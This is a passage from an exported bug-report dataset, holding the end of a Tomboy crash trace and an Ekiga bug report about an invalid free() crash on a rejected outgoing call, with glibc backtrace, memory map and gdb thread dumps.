at Tomboy.NoteManager.Create (stringstring) 
at NoteOfTheDay.Create (Tomboy.NoteManagerSystem.DateTime) 
at NoteOfTheDayPlugin.CheckNewDay (objectSystem.EventArgs) 
at (wrapper delegate-invoke) System.MulticastDelegate.invoke_void_object_EventArgs (objectSystem.EventArgs) 
at Tomboy.InterruptableTimeout.TimeoutExpired () 
at (wrapper delegate-invoke) System.MulticastDelegate.invoke_bool () 
at TimeoutProxy.Handler () 
at (wrapper native-to-managed) TimeoutProxy.Handler () 
in (unmanaged) 0xb7f4edd5
at (wrapper managed-to-native) Gtk.Application.gtk_main () 
at Gtk.Application.Run () 
at Gnome.Program.Run () 
at Tomboy.Application.StartMainLoop () 
at Tomboy.Tomboy.StartTrayIcon () 
at Tomboy.Tomboy.Main (string[]) 
Other information:</t>
  </si>
  <si>
    <t>lauromoura</t>
  </si>
  <si>
    <t>EKIGA-379801</t>
  </si>
  <si>
    <t>Invalid free() when outgoing call is rejected.</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Launch ekiga (using provider cellip - mysecretary.net).
2. Dial out (in this case to a cellphone).
3. Reject the incoming call (on the cellphone).
4. Ekiga crashes (I can reliably reproduce this).
Stack trace:
*** glibc detected *** /usr/bin/ekiga: free(): invalid pointer: 0x08784fc8 ***
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6[0xb639b8bd]
/lib/tls/i686/cmov/libc.so.6(__libc_free+0x84)[0xb639ba44]
/usr/lib/libpt.so.1.10.2(_ZN14PAbstractArray15DestroyContentsEv+0x48)[0xb725a1c8]
/usr/lib/libpt.so.1.10.2(_ZN10PContainer8DestructEv+0x57)[0xb725b207]
/usr/bin/ekiga(_ZN7PStringD1Ev+0x18)[0x80764f8]
/usr/lib/libopal.so.2.2(_ZN7SIP_PDUD0Ev+0x48)[0xb6d72848]
/usr/lib/libopal.so.2.2(_ZN13SIPConnection20HandlePDUsThreadMainER7PThreadi+0x110)[0xb6d5a4b0]
/usr/lib/libopal.so.2.2(_ZNK13SIPConnection30HandlePDUsThreadMain_PNotifier4CallER7PObjecti+0x25)[0xb6d663c5]
/usr/lib/libpt.so.1.10.2(_ZN13PSimpleThread4MainEv+0x2f)[0xb724586f]
/usr/lib/libpt.so.1.10.2(_ZN7PThread14PX_ThreadStartEPv+0x6d)[0xb722e04d]
/lib/tls/i686/cmov/libpthread.so.0[0xb657f504]
/lib/tls/i686/cmov/libc.so.6(__clone+0x5e)[0xb640251e]
======= Memory map: ========
08048000-080fa000 r-xp 00000000 03:02 2041482    /usr/bin/ekiga
080fa000-08101000 rw-p 000b2000 03:02 2041482    /usr/bin/ekiga
08101000-0889d000 rw-p 08101000 00:00 0          [heap]
ada6f000-ada70000 ---p ada6f000 00:00 0 
ada70000-adab0000 rw-p ada70000 00:00 0 
adab0000-adab1000 ---p adab0000 00:00 0 
adab1000-ae2b1000 rw-p adab1000 00:00 0 
aeab2000-aeab3000 ---p aeab2000 00:00 0 
aeab3000-af2b3000 rw-p aeab3000 00:00 0 
b15bf000-b15c0000 ---p b15bf000 00:00 0 
b15c0000-b1621000 rw-p b15c0000 00:00 0 
b1621000-b1700000 ---p b1621000 00:00 0 
b1730000-b1731000 ---p b1730000 00:00 0 
b1731000-b1771000 rw-p b1731000 00:00 0 
b1771000-b17a1000 r-xp 00000000 03:02 1035325    /usr/lib/libcroco-0.6.so.3.0.1
b17a1000-b17a4000 rw-p 0002f000 03:02 1035325    /usr/lib/libcroco-0.6.so.3.0.1
b17a4000-b17cd000 r-xp 00000000 03:02 1032991    /usr/lib/libgsf-1.so.114.0.1
b17cd000-b17d0000 rw-p 00028000 03:02 1032991    /usr/lib/libgsf-1.so.114.0.1
b17d0000-b17d1000 rw-p b17d0000 00:00 0 
b17d1000-b1800000 r-xp 00000000 03:02 1029680    /usr/lib/librsvg-2.so.2.16.0
b1800000-b1801000 rw-p 0002f000 03:02 1029680    /usr/lib/librsvg-2.so.2.16.0
b1801000-b1802000 ---p b1801000 00:00 0 
b1802000-b2002000 rw-p b1802000 00:00 0 
b2002000-b2003000 ---p b2002000 00:00 0 
b2003000-b2043000 rw-p b2003000 00:00 0 
b2043000-b2044000 ---p b2043000 00:00 0 
b2044000-b2844000 rw-p b2044000 00:00 0 
b2844000-b2845000 ---p b2844000 00:00 0 
b2845000-b3045000 rw-p b2845000 00:00 0 
b3045000-b3046000 ---p b3045000 00:00 0 
b3046000-b3086000 rw-p b3046000 00:00 0 
b3086000-b3087000 ---p b3086000 00:00 0 
b3087000-b30c7000 rw-p b3087000 00:00 0 
b30c7000-b3127000 rw-s 00000000 00:08 87326727   /SYSV00000000 (deleted)
b3127000-b3128000 ---p b3127000 00:00 0 
b3128000-b3168000 rw-p b3128000 00:00 0 
b3168000-b316c000 r-xp 00000000 03:02 701836     /lib/tls/i686/cmov/libnss_dns-2.4.so
b316c000-b316e000 rw-p 00003000 03:02 701836     /lib/tls/i686/cmov/libnss_dns-2.4.so
b3186000-b318d000 r--p 00000000 03:02 2254678    /usr/share/locale-langpack/sv/LC_MESSAGES/gnome-vfs-2.0.mo
b318d000-b31f1000 r--p 00000000 03:02 1697339    /usr/share/fonts/truetype/ttf-dejavu/DejaVuSans-Oblique.ttf
b31f5000-b3204000 r-xp 00000000 03:02 701967     /lib/libbz2.so.1.0.3
b3204000-b3205000 rw-p 0000f000 03:02 701967     /lib/libbz2.so.1.0.3
b3223000-b3224000 r-xp 00000000 03:02 2072732    /usr/lib/gtk-2.0/2.10.0/loaders/svg_loader.so
b3224000-b3225000 rw-p 00001000 03:02 2072732    /usr/lib/gtk-2.0/2.10.0/loaders/svg_loader.so
b3225000-b3232000 r--s 00000000 03:02 1094644    /usr/share/mime/mime.cache
b3232000-b3233000 ---p b3232000 00:00 0 
b3233000-b3273000 rw-p b3233000 00:00 0 
b3273000-b3274000 ---p b3273000 00:00 0 
b3274000-b32b4000 rw-p b3274000 00:00 0 
b32b4000-b32ba000 r-xp 00000000 03:02 2072739    /usr/lib/gtk-2.0/2.10.0/loaders/libpixbufloader-xpm.so
b32ba000-b32bb000 rw-p 00005000 03:02 2072739    /usr/lib/gtk-2.0/2.10.0/loaders/libpixbufloader-xpm.so
b32bb000-b32c2000 r-xp 00000000 03:02 1033879    /usr/lib/libfam.so.0.0.0
b32c2000-b32c3000 rw-p 00006000 03:02 1033879    /usr/lib/libfam.so.0.0.0
b32c3000-b32c8000 r-xp 00000000 03:02 702175     /lib/libacl.so.1.1.0
b32c8000-b32c9000 rw-p 00005000 03:02 702175     /lib/libacl.so.1.1.0
b32c9000-b32cc000 r-xp 00000000 03:02 701849     /lib/libattr.so.1.1.0
b32cc000-b32cd000 rw-p 00002000 03:02 701849     /lib/libattr.so.1.1.0
b32cd000-b32e3000 r--p 00000000 03:02 2252519    /usr/share/locale-langpack/sv/LC_MESSAGES/evolution-data-server-1.8.mo
b32e3000-b32e5000 r--p 00000000 03:02 2254178    /usr/share/locale-langpack/sv/LC_MESSAGES/atk10.mo
b32e5000-b32eb000 r--p 00000000 03:02 2254677    /usr/share/locale-langpack/sv/LC_MESSAGES/libgnomeui-2.0.mo
b32eb000-b32f7000 r-xp 00000000 03:02 1534665    /usr/lib/gnome-vfs-2.0/modules/libfile.so
b32f7000-b32f8000 rw-p 0000b000 03:02 
Program received signal SIGABRT Aborted.
[Switching to Thread -1317598304 (LWP 3534)]
0xffffe410 in __kernel_vsyscall ()
(gdb) thread apply all bt
Thread 36 (Thread -1317598304 (LWP 3534)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb635e770 in raise () from /lib/tls/i686/cmov/libc.so.6
#2  0xb635fef3 in abort () from /lib/tls/i686/cmov/libc.so.6
#3  0xb6393d0b in __libc_message () from /lib/tls/i686/cmov/libc.so.6
#4  0xb639b8bd in _int_free () from /lib/tls/i686/cmov/libc.so.6
#5  0xb639ba44 in free () from /lib/tls/i686/cmov/libc.so.6
#6  0xb725a1c8 in PAbstractArray::DestroyContents (this=0x87a4344)
    at ../common/contain.cxx:850
#7  0xb725b207 in PContainer::Destruct (this=0x87a4344)
    at ../common/contain.cxx:767
#8  0x080764f8 in ~PString (this=0x87a4344) at /usr/include/ptlib/array.h:171
#9  0xb6d72848 in SIP_PDU::~SIP_PDU () from /usr/lib/libopal.so.2.2
#10 0x087a4344 in ?? ()
#11 0x00000000 in ?? ()
Thread 35 (Thread -1319109728 (LWP 3533)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb63fb321 in ___newselect_nocancel () from /lib/tls/i686/cmov/libc.so.6
#2  0xb722d3c8 in PThread::PXBlockOnIO (this=0x8758938 handle=60 type=0 
    timeout=@0x88810a4) at tlibthrd.cxx:1430
#3  0xb7220a0b in PChannel::PXSetIOBlock (this=0x8881068 
---Type  to continue or q  to quit---
    type=PChannel::PXReadBlock timeout=@0x88810a4) at channel.cxx:242
#4  0xb7219ac2 in PSocket::os_recvfrom (this=0x8881068 buf=0x88235c0 
    len=65535 flags=0 addr=0xb15fecb0 addrlen=0xb15fecac) at socket.cxx:836
#5  0xb723ab4e in PIPDatagramSocket::ReadFrom (this=0x8881068 buf=0x88235c0 
    len=65535 addr=@0x8881174 port=@0x888118c) at ../common/sockets.cxx:2830
#6  0xb723ac1f in PUDPSocket::Read (this=0x8881068 buf=0x88235c0 len=65535)
    at ../common/sockets.cxx:3174
#7  0xb722023b in PIndirectChannel::Read (this=0x87a0d70 buf=0x88235c0 
    len=65535) at ../common/pchannel.cxx:825
#8  0xb68b464d in OpalTransportUDP::Read () from /usr/lib/libopal.so.2.2
#9  0x087a0d70 in ?? ()
#10 0x088235c0 in ?? ()
#11 0x0000ffff in ?? () at /usr/include/ptclib/http.h:494
#12 0xb15fee5c in ?? ()
#13 0x08871364 in ?? ()
#14 0xb15fedf4 in ?? ()
#15 0xb6581cd9 in pthread_mutex_unlock ()
   from /lib/tls/i686/cmov/libpthread.so.0
#16 0xb7220893 in PChannelStreamBuffer::underflow (this=0x869c568)
    at ../common/pchannel.cxx:210
#17 0xb7220693 in PChannelStreamBuffer::seekoff (this=0x869c568 off=0 
    dir=std::_S_cur) at ../common/pchannel.cxx:254
#18 0xb6d70448 in SIP_PDU::Read () from /usr/lib/libopal.so.2.2
---Type  to continue or q  to quit---
#19 0xb15ff218 in ?? ()
#20 0x0869c568 in ?? ()
#21 0x00000000 in ?? ()
Thread 28 (Thread -1308349536 (LWP 3496)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb63fb321 in ___newselect_nocancel () from /lib/tls/i686/cmov/libc.so.6
#2  0xb722d3c8 in PThread::PXBlockOnIO (this=0x8481b18 handle=54 type=0 
    timeout=@0x848003c) at tlibthrd.cxx:1430
#3  0xb7220a0b in PChannel::PXSetIOBlock (this=0x8480000 
    type=PChannel::PXReadBlock timeout=@0x848003c) at channel.cxx:242
#4  0xb7219ac2 in PSocket::os_recvfrom (this=0x8480000 buf=0x8551918 
    len=65535 flags=0 addr=0xb2041cb0 addrlen=0xb2041cac) at socket.cxx:836
#5  0xb723ab4e in PIPDatagramSocket::ReadFrom (this=0x8480000 buf=0x8551918 
    len=65535 addr=@0x848010c port=@0x8480124) at ../common/sockets.cxx:2830
#6  0xb723ac1f in PUDPSocket::Read (this=0x8480000 buf=0x8551918 len=65535)
    at ../common/sockets.cxx:3174
#7  0xb722023b in PIndirectChannel::Read (this=0x8641fa8 buf=0x8551918 
    len=65535) at ../common/pchannel.cxx:825
#8  0xb68b464d in OpalTransportUDP::Read () from /usr/lib/libopal.so.2.2
#9  0x08641fa8 in ?? ()
#10 0x08551918 in ?? ()
#11 0x0000ffff in ?? () at /usr/include/ptclib/http.h:494
---Type  to continue or q  to quit---
#12 0xb2041e5c in ?? ()
#13 0x08100fc0 in main::instance ()
#14 0xb7277fb5 in typeinfo name for PDictionary () from /usr/lib/libpt.so.1.10.2
#15 0x00000000 in ?? ()
Thread 24 (Thread -1291297888 (LWP 3489)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb63fb321 in ___newselect_nocancel () from /lib/tls/i686/cmov/libc.so.6
#2  0xb722d3c8 in PThread::PXBlockOnIO (this=0x8619eb0 handle=45 type=0 
    timeout=@0x869ceb4) at tlibthrd.cxx:1430
#3  0xb7220a0b in PChannel::PXSetIOBlock (this=0x869ce78 
    type=PChannel::PXReadBlock timeout=@0x869ceb4) at channel.cxx:242
#4  0xb7219ac2 in PSocket::os_recvfrom (this=0x869ce78 buf=0x8531908 
    len=65535 flags=0 addr=0xb3084cb0 addrlen=0xb3084cac) at socket.cxx:836
#5  0xb723ab4e in PIPDatagramSocket::ReadFrom (this=0x869ce78 buf=0x8531908 
    len=65535 addr=@0x869cf84 port=@0x869cf9c) at ../common/sockets.cxx:2830
#6  0xb723ac1f in PUDPSocket::Read (this=0x869ce78 buf=0x8531908 len=65535)
    at ../common/sockets.cxx:3174
#7  0xb722023b in PIndirectChannel::Read (this=0x85b1100 buf=0x8531908 
    len=65535) at ../common/pchannel.cxx:825
#8  0xb68b464d in OpalTransportUDP::Read () from /usr/lib/libopal.so.2.2
#9  0x085b1100 in ?? ()
---Type  to continue or q  to quit---
#10 0x08531908 in ?? ()
#11 0x0000ffff in ?? () at /usr/include/ptclib/http.h:494
#12 0xb3084e5c in ?? ()
#13 0x08100fc0 in main::instance ()
#14 0xb7277fb5 in typeinfo name for PDictionary () from /usr/lib/libpt.so.1.10.2
#15 0x00000000 in ?? ()
Thread 20 (Thread -1291031648 (LWP 3485)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb63fb321 in ___newselect_nocancel () from /lib/tls/i686/cmov/libc.so.6
#2  0xb721aa20 in PSocket::Select (read=@0xb30c5e04 write=@0xb30c5da0 
    except=@0xb30c5d94 timeout=@0xb30c5e10) at socket.cxx:614
#3  0xb723ca35 in PSocket::Select (read=@0xb30c5e04 timeout=@0xb30c5e10)
    at ../common/sockets.cxx:1664
#4  0xb68b4842 in OpalTransportUDP::Read () from /usr/lib/libopal.so.2.2
#5  0xb30c5e04 in ?? ()
#6  0xb30c5e10 in ?? ()
#7  0x0869c220 in ?? ()
#8  0xb30c5e5c in ?? ()
#9  0x00000001 in ?? ()
#10 0x00000001 in ?? ()
#11 0x085118f8 in ?? ()
---Type  to continue or q  to quit---
#12 0x0869c220 in ?? ()
#13 0xb30c5e28 in ?? ()
#14 0xb654dc8c in __cxxabiv1::__si_class_type_info::__do_dyncast (
    this=0x843aaa8 src2dst=-1221583896 access_path=2147483647 dst_type=0x0 
    obj_ptr=0xb6dc65f5 src_type=0x869c220 src_ptr=0x84442b8 
    result=@0x869c4cc) at ../../../../src/libstdc++-v3/libsupc++/tinfo.cc:386
#15 0x088809b0 in ?? ()
#16 0x0843aaa8 in ?? ()
#17 0xb7301be8 in vtable for PTimeInterval () from /usr/lib/libpt.so.1.10.2
#18 0x7fffffff in ?? ()
#19 0x00000000 in ?? ()
Thread 19 (Thread -1290372192 (LWP 3484)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb63fb321 in ___newselect_nocancel () from /lib/tls/i686/cmov/libc.so.6
#2  0xb722d3c8 in PThread::PXBlockOnIO (this=0x861a818 handle=46 type=0 
    timeout=@0x846aac4) at tlibthrd.cxx:1430
#3  0xb7220a0b in PChannel::PXSetIOBlock (this=0x846aa88 
    type=PChannel::PXReadBlock timeout=@0x846aac4) at channel.cxx:242
#4  0xb7219ac2 in PSocket::os_recvfrom (this=0x846aa88 buf=0x84f18e8 
    len=65535 flags=0 addr=0xb3166cb0 addrlen=0xb3166cac) at socket.cxx:836
#5  0xb723ab4e in PIPDatagramSocket::ReadFrom (this=0x846aa88 buf=0x84f18e8 
    len=65535 addr=@0x846ab94 port=@0x846abac) at ../common/sockets.cxx:2830
---Type  to continue or q  to quit---
#6  0xb723ac1f in PUDPSocket::Read (this=0x846aa88 buf=0x84f18e8 len=65535)
    at ../common/sockets.cxx:3174
#7  0xb722023b in PIndirectChannel::Read (this=0x861dc00 buf=0x84f18e8 
    len=65535) at ../common/pchannel.cxx:825
#8  0xb68b464d in OpalTransportUDP::Read () from /usr/lib/libopal.so.2.2
#9  0x0861dc00 in ?? ()
#10 0x084f18e8 in ?? ()
#11 0x0000ffff in ?? () at /usr/include/ptclib/http.h:494
#12 0xb3166e5c in ?? ()
#13 0x08100fc0 in main::instance ()
#14 0xb7277fb5 in typeinfo name for PDictionary () from /usr/lib/libpt.so.1.10.2
#15 0x00000000 in ?? ()
Thread 17 (Thread -1289278560 (LWP 3480)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb63fb321 in ___newselect_nocancel () from /lib/tls/i686/cmov/libc.so.6
#2  0xb721aa20 in PSocket::Select (read=@0xb32722f0 write=@0xb3272220 
    except=@0xb3272214 timeout=@0xb32723d0) at socket.cxx:614
#3  0xb723ca35 in PSocket::Select (read=@0xb32722f0 timeout=@0xb32723d0)
    at ../common/sockets.cxx:1664
#4  0xb68b7bdb in OpalListenerUDP::Accept () from /usr/lib/libopal.so.2.2
#5  0xb32722f0 in ?? ()
---Type  to continue or q  to quit---
#6  0xb32723d0 in ?? ()
#7  0xb32723d8 in ?? ()
#8  0x08670c08 in ?? ()
#9  0x00000000 in ?? ()
Thread 16 (Thread -1289012320 (LWP 3479)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb63fb321 in ___newselect_nocancel () from /lib/tls/i686/cmov/libc.so.6
#2  0xb722d3c8 in PThread::PXBlockOnIO (this=0x861ec50 handle=36 type=2 
    timeout=@0xb32b31e0) at tlibthrd.cxx:1430
#3  0xb7220a0b in PChannel::PXSetIOBlock (this=0x8625e38 
    type=PChannel::PXAcceptBlock timeout=@0xb32b31e0) at channel.cxx:242
#4  0xb721ab43 in PSocket::os_accept (this=0x862ae00 listener=@0x8625e38 
    addr=0xb32b3228 size=0xb32b3224) at socket.cxx:492
#5  0xb723a46f in PTCPSocket::Accept (this=0x862ae00 socket=@0x8625e38)
    at ../common/sockets.cxx:2767
#6  0xb68b659b in OpalListenerTCP::Accept () from /usr/lib/libopal.so.2.2
#7  0x0862ae00 in ?? ()
#8  0x08625e38 in ?? ()
#9  0x000003f0 in ?? () at /usr/include/ptclib/http.h:494
#10 0xb730675c in ?? () from /usr/lib/libpt.so.1.10.2
#11 0x000003e8 in ?? () at /usr/include/ptclib/http.h:494
#12 0x00000016 in ?? ()
---Type  to continue or q  to quit---
#13 0xb68b3608 in OpalListener::ListenForConnections ()
   from /usr/lib/libopal.so.2.2
#14 0x08625e00 in ?? ()
#15 0xb32b33d0 in ?? ()
#16 0x00000000 in ?? ()
Thread 15 (Thread -1381303392 (LWP 3473)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb63f8803 in poll () from /lib/tls/i686/cmov/libc.so.6
#2  0xb73ce813 in g_main_context_iterate (context=0x84d41c0 block=1 
    dispatch=1 self=0x84d3d18) at gmain.c:2979
#3  0xb73ceb89 in IA__g_main_loop_run (loop=0x84d3fd0) at gmain.c:2881
#4  0xb74927e0 in link_io_thread_fn (data=0x0) at linc.c:396
#5  0xb73e938f in g_thread_create_proxy (data=0x84d3d18) at gthread.c:553
#6  0xb657f504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
#7  0xb640251e in clone () from /lib/tls/i686/cmov/libc.so.6
Thread 14 (Thread -1372910688 (LWP 3471)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb63f8803 in poll () from /lib/tls/i686/cmov/libc.so.6
#2  0xb73ce813 in g_main_context_iterate (context=0x84d30b0 block=1 
    dispatch=1 self=0x84d3060) at gmain.c:2979
#3  0xb73ceb89 in IA__g_main_loop_run (loop=0x84d3cf8) at gmain.c:2881
---Type  to continue or q  to quit---
#4  0xb7746e62 in startup_mainloop (arg=0x0) at e-book.c:3760
#5  0xb73e938f in g_thread_create_proxy (data=0x84d3060) at gthread.c:553
#6  0xb657f504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
#7  0xb640251e in clone () from /lib/tls/i686/cmov/libc.so.6
Thread 3 (Thread -1249862752 (LWP 3456)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb63fb321 in ___newselect_nocancel () from /lib/tls/i686/cmov/libc.so.6
#2  0xb722de00 in PThread::Sleep (timeout=@0xb5809228) at tlibthrd.cxx:1210
#3  0x08097681 in gnomemeeting_sound_daemons_suspend ()
    at devices/audio.cpp:105
#4  0x0809948b in GMSoundEvent (this=0xb5809274 ev=@0xb5809288)
    at devices/audio.cpp:132
#5  0x080adb58 in GMPCSSEndpoint::PlaySoundEvent (this=0x85feb08 
    ev=@0xb58092d0) at endpoints/pcss.cpp:192
#6  0x080aded0 in GMPCSSEndpoint::OnOutgoingCall (this=0x85feb08)
    at endpoints/pcss.cpp:452
#7  0xb7246495 in PTimer::OnTimeout (this=0x85fecc0)
    at ../common/osutils.cxx:1308
#8  0xb7246661 in PTimer::Process (this=0x85fecc0 delta=@0xb5809370 
    minTimeLeft=@0xb5809404) at ../common/osutils.cxx:1350
#9  0xb7248d61 in PTimerList::Process (this=0x8100f94)
    at ../common/osutils.cxx:1395
---Type  to continue or q  to quit---
#10 0xb722da55 in PHouseKeepingThread::Main (this=0x814b2e8)
    at tlibthrd.cxx:652
#11 0xb722e04d in PThread::PX_ThreadStart (arg=0x814b2e8) at tlibthrd.cxx:1340
#12 0xb657f504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
#13 0xb640251e in clone () from /lib/tls/i686/cmov/libc.so.6
Thread 2 (Thread -1249596512 (LWP 3455)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb6582a8c in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0xb722e5a3 in PSyncPoint::Wait (this=0x81498e4 waitTime=@0xb584a3d0)
    at tlibthrd.cxx:1964
#3  0xb687d76f in OpalManager::GarbageMain () from /usr/lib/libopal.so.2.2
#4  0x081498e4 in ?? ()
#5  0xb584a3d0 in ?? ()
#6  0x00000000 in ?? ()
Thread 1 (Thread -1247730000 (LWP 3183)):
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb640ed1e in __lll_mutex_lock_wait () from /lib/tls/i686/cmov/libc.so.6
#2  0xb639f64e in _L_mutex_lock_4345 () from /lib/tls/i686/cmov/libc.so.6
#3  0xbfcdaf28 in ?? ()
#4  0xb73e3012 in IA__g_slice_free1 (mem_size=141032552 mem_block=0xb65813e0)
---Type  to continue or q  to quit---
    at gslice.c:403
#5  0xb73d2b51 in IA__g_free (mem=0x867fc68) at gmem.c:187
#6  0xb7b8064a in IA__gtk_target_list_unref (list=0x867fbf8)
    at gtkselection.c:249
#7  0xb7b82c1f in IA__gtk_selection_clear_targets (widget=0x85fc108 
    selection=0x1) at gtkselection.c:852
#8  0xb7c5328e in gtk_clipboard_set_contents (clipboard=0x85961a0 
    targets=0xb7d33440 n_targets=4 get_func=0xb7b0ccf0  
    clear_func=0xb7b0cc20  user_data=0x87a4668 
    have_owner=1) at gtkclipboard.c:526
#9  0xb7b0d666 in gtk_label_select_region_index (label=0x87a4668 
    anchor_index=0 end_index=24) at gtklabel.c:3374
#10 0xb7b113a8 in gtk_label_grab_focus (widget=0x87a4668) at gtklabel.c:2839
#11 0xb7678b29 in IA__g_cclosure_marshal_VOID__VOID (closure=0x8157300 
    return_value=0x0 n_param_values=1 param_values=0xbfcdb27c 
    invocation_hint=0xbfcdb18c marshal_data=0xb7b11320) at gmarshal.c:77
#12 0xb7669fb9 in g_type_class_meta_marshal (closure=0x8157300 
    return_value=0x0 n_param_values=1 param_values=0xbfcdb27c 
    invocation_hint=0xbfcdb18c marshal_data=0xa4) at gclosure.c:567
#13 0xb766b79b in IA__g_closure_invoke (closure=0x8157300 return_value=0x0 
    n_param_values=1 param_values=0xbfcdb27c invocation_hint=0xbfcdb18c)
    at gclosure.c:490
#14 0xb767c1e3 in signal_emit_unlocked_R (node=0x81574f8 detail=0 
---Type  to continue or q  to quit---
    instance=0x87a4668 emission_return=0x0 instance_and_params=0xbfcdb27c)
    at gsignal.c:2478
#15 0xb767d0b7 in IA__g_signal_emit_valist (instance=0x87a4668 signal_id=47 
    detail=0 
    var_args=0xbfcdb4bc ï¿½ï¿½Ã·\220kÓ·hFz\bØ´Í¿ï¿½ï¿½Ã·hFz\b\220ï¿½Ã·ï¿½ï¿½Í¿^iï¿½ï¿½hFz\b)
    at gsignal.c:2199
#16 0xb767d279 in IA__g_signal_emit (instance=0x87a4668 signal_id=47 
    detail=0) at gsignal.c:2243
#17 0xb7c3e362 in IA__gtk_widget_grab_focus (widget=0x87a4668)
    at gtkwidget.c:4216
#18 0xb7c3e3bc in gtk_widget_real_focus (widget=0x87a4668 
    direction=GTK_DIR_TAB_FORWARD) at gtkwidget.c:4323
#19 0xb7b2695e in _gtk_marshal_BOOLEAN__ENUM (closure=0x8156998 
    return_value=0xbfcdb660 n_param_values=2 param_values=0xbfcdb73c 
    invocation_hint=0xbfcdb64c marshal_data=0xb7c3e390) at gtkmarshalers.c:164
#20 0xb7669fb9 in g_type_class_meta_marshal (closure=0x8156998 
    return_value=0xbfcdb660 n_param_values=2 param_values=0xbfcdb73c 
    invocation_hint=0xbfcdb64c marshal_data=0xa8) at gclosure.c:567
#21 0xb766b87d in IA__g_closure_invoke (closure=0x8156998 
    return_value=0xbfcdb660 n_param_values=2 param_values=0xbfcdb73c 
    invocation_hint=0xbfcdb64c) at gclosure.c:490
#22 0xb767c1e3 in signal_emit_unlocked_R (node=0x8157610 detail=0 
    instance=0x87a4668 emission_return=0xbfcdb8fc 
---Type  to continue or q  to quit---
    instance_and_params=0xbfcdb73c) at gsignal.c:2478
#23 0xb767ce7f in IA__g_signal_emit_valist (instance=0x87a4668 signal_id=48 
    detail=0 var_args=) at gsignal.c:2209
#24 0xb767d279 in IA__g_signal_emit (instance=0x87a4668 signal_id=48 
    detail=0) at gsignal.c:2243
#25 0xb7c3cf38 in IA__gtk_widget_child_focus (widget=0x87a4668 
    direction=GTK_DIR_TAB_FORWARD) at gtkwidget.c:5895
#26 0xb7a93b37 in gtk_container_focus (widget=0x85b4468 
    direction=GTK_DIR_TAB_FORWARD) at gtkcontainer.c:2036
#27 0xb7b2695e in _gtk_marshal_BOOLEAN__ENUM (closure=0x8156998 
    return_value=0xbfcdbb70 n_param_values=2 param_values=0xbfcdbc4c 
    invocation_hint=0xbfcdbb5c marshal_data=0xb7a93a00) at gtkmarshalers.c:164
#28 0xb7669fb9 in g_type_class_meta_marshal (closure=0x8156998 
    return_value=0xbfcdbb70 n_param_values=2 param_values=0xbfcdbc4c 
    invocation_hint=0xbfcdbb5c marshal_data=0xa8) at gclosure.c:567
#29 0xb766b87d in IA__g_closure_invoke (closure=0x8156998 
    return_value=0xbfcdbb70 n_param_values=2 param_values=0xbfcdbc4c 
    invocation_hint=0xbfcdbb5c) at gclosure.c:490
#30 0xb767c1e3 in signal_emit_unlocked_R (node=0x8157610 detail=0 
    instance=0x85b4468 emission_return=0xbfcdbe0c 
    instance_and_params=0xbfcdbc4c) at gsignal.c:2478
#31 0xb767ce7f in IA__g_signal_emit_valist (instance=0x85b4468 signal_id=48 
    detail=0 var_args=) at gsignal.c:2209
---Type  to continue or q  to quit---
#32 0xb767d279 in IA__g_signal_emit (instance=0x85b4468 signal_id=48 
    detail=0) at gsignal.c:2243
#33 0xb7c3cf38 in IA__gtk_widget_child_focus (widget=0x85b4468 
    direction=GTK_DIR_TAB_FORWARD) at gtkwidget.c:5895
#34 0xb7a93b37 in gtk_container_focus (widget=0x8596240 
    direction=GTK_DIR_TAB_FORWARD) at gtkcontainer.c:2036
#35 0xb7b2695e in _gtk_marshal_BOOLEAN__ENUM (closure=0x8156998 
    return_value=0xbfcdc080 n_param_values=2 param_values=0xbfcdc15c 
    invocation_hint=0xbfcdc06c marshal_data=0xb7a93a00) at gtkmarshalers.c:164
#36 0xb7669fb9 in g_type_class_meta_marshal (closure=0x8156998 
    return_value=0xbfcdc080 n_param_values=2 param_values=0xbfcdc15c 
    invocation_hint=0xbfcdc06c marshal_data=0xa8) at gclosure.c:567
#37 0xb766b87d in IA__g_closure_invoke (closure=0x8156998 
    return_value=0xbfcdc080 n_param_values=2 param_values=0xbfcdc15c 
    invocation_hint=0xbfcdc06c) at gclosure.c:490
#38 0xb767c1e3 in signal_emit_unlocked_R (node=0x8157610 detail=0 
    instance=0x8596240 emission_return=0xbfcdc31c 
    instance_and_params=0xbfcdc15c) at gsignal.c:2478
#39 0xb767ce7f in IA__g_signal_emit_valist (instance=0x8596240 signal_id=48 
    detail=0 var_args=) at gsignal.c:2209
#40 0xb767d279 in IA__g_signal_emit (instance=0x8596240 signal_id=48 
    detail=0) at gsignal.c:2243
#41 0xb7c3cf38 in IA__gtk_widget_child_focus (widget=0x8596240 
---Type  to continue or q  to quit---
    direction=GTK_DIR_TAB_FORWARD) at gtkwidget.c:5895
#42 0xb7a93b37 in gtk_container_focus (widget=0x85b44b8 
    direction=GTK_DIR_TAB_FORWARD) at gtkcontainer.c:2036
#43 0xb7b2695e in _gtk_marshal_BOOLEAN__ENUM (closure=0x8156998 
    return_value=0xbfcdc590 n_param_values=2 param_values=0xbfcdc66c 
    invocation_hint=0xbfcdc57c marshal_data=0xb7a93a00) at gtkmarshalers.c:164
#44 0xb7669fb9 in g_type_class_meta_marshal (closure=0x8156998 
    return_value=0xbfcdc590 n_param_values=2 param_values=0xbfcdc66c 
    invocation_hint=0xbfcdc57c marshal_data=0xa8) at gclosure.c:567
#45 0xb766b87d in IA__g_closure_invoke (closure=0x8156998 
    return_value=0xbfcdc590 n_param_values=2 param_values=0xbfcdc66c 
    invocation_hint=0xbfcdc57c) at gclosure.c:490
